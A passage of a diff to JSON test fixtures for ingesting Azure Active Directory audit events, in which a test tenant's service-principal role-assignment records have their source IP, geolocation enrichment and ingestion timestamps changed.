Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -11983,25 +10957,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -12015,7 +10971,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -12151,7 +11107,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -12163,12 +11119,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036420700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125175700Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -12194,25 +11150,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -12226,7 +11164,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -12362,7 +11300,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -12374,12 +11312,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036425100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125181300Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
